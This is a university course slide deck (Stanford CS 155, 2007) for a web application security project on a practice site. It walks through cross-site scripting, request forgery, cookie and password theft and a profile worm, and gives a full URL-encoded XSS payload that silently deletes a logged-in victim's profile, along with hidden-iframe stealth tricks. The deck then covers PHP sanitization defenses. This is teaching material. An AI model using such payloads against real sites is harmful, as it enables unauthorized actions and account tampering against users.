210 likes | 348 Views
Spring 2007. CS 155. Project 2: Web App Security. Collin Jackson. Part 1. Attacks. Overview. Explore several attack types Requires both effectiveness and stealth Learn : How an attacker can evade sanitization Consequences of an exploit JavaScript Very basic CSS.
E N D
Spring 2007 CS 155 Project 2: Web App Security Collin Jackson
Part 1 Attacks
Overview • Explore several attack types • Requires both effectiveness and stealth • Learn: • How an attacker can evade sanitization • Consequences of an exploit • JavaScript • Very basic CSS
A: Cookie Theft Use URL encoding Could hijack session C: Password Theft Evade sanitization Handle DOM events B: Request Forgery Navigate browser Use iframes, forms D: Profile Worm Persistent attack Replicates Attacks form link email zoobar.org zoobar.org badguy.com redirect stanford.edu form badguy.com email zoobar.org zoobar.org
Sanitization • Works differently depending on context • <tag property=" attackstring "> • Attack: Break out with ' " • Defense: escape quotes with \ • <body> attackstring </body> • Attack: Launch script with < > • Attack: Close off parent tag </tag> • Defense: escape angle brackets • eval( attackstring ) • Attack: Do whatever you want • Defense: Don’t do that
Example: Profile Deleter ??? • Malicious hyperlink deletes profile of user who clicks it • Only works when user logged in • User might have multiple tabs open • Might have chosen/forgotten not to log out • Might appear in another user’s profile • Uses vulnerability in users.php from Attack A • Constructs profile deletion form and submits it
Find vulnerability Site reflects query parameter in input field Link can include anything we want here
Copy form data View source to find form fields Create copycat form with our modifications
URL encode http://scriptasylum.com/tutorials/encdec/encode-decode.html http://www.dommermuth-1.com/protosite/experiments/encode/index.html Close previous <input>, <form> Button click triggers form submit
Debugging It didn’t work. Open JavaScript console Check error Undefined No properties! Two forms with same name
Fixed version Now with correct form
Final Test http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform %0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C% 2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22 Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28 %29%3C%2Fscript%3E users.php replaced with index.php Profile deleted
Stealthier approaches • Post form into hidden iframe <form name=F action=/index.php target=myframe>… <iframe name=myframe style=“visibility:hidden”>… • Open page with form in hidden iframe <iframe name=myframe style=“visibility:hidden”>… <script>document.myframe.contentDocument.forms[0] .profile_update.value =“”;</script>
Part 2 Defenses
Goals • Learn: • How easy it is to make mistakes • That even simple code can be hard to secure • Techniques for appropriate input validation • PHP • Very basic SQL Little programming knowledge can be a dangerous thing
File structure • index.php • users.php • transfer.php • login.php • includes/ • auth.php (cookie authentication) • common.php (includes everything else) • navigation.php (site template) • db/ • zoobar/ • Person.txt (must be writable by web server) • Includes /usr/class/cs155/projects/pp2/txt-db-api/… Only edit these files
txt-db-api • Third-party text file database library • Data can be int, string, and autoincrement • Need to escape strings: \' \" \\ • Actually magic_quotes_gpc does this for us $recipient = $_POST[‘recipient’]; // already escaped $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executeQuery($sql); if( $rs->next() ) $id = $rs->getCurrentValueByName(‘PersonID’);
A: Cookie Theft C: Password Theft B: Request Forgery Attack D: Profile Worm Defenses to Part 1
PHP Sanitization Techniques • addslashes(string) • Prepends backslash to ' " \ • Already done by magic_quotes_gpc • Inverse: stripslashes(string) • htmlspecialchars(string [, quote_style]) • Converts & < > " to HTML entities • Use ENT_QUOTES to change 'to ' • strip_tags(string, [, allowable_tags]) • Max tag length 1024 • Does not sanitize tag properties • preg_replace(pattern, replacement, subject) • More info: http://php.net
More XSS hunting • Look for untrusted input used as output • Note sanitization already applied to each variable • Form data has magic_quotes_gpc, db data does not • Sanitize the output if necessary • No penalty for erring on the side of caution • But sanitizing multiple times may lead to problems • No credit for solving non-goals: SQL injection, etc.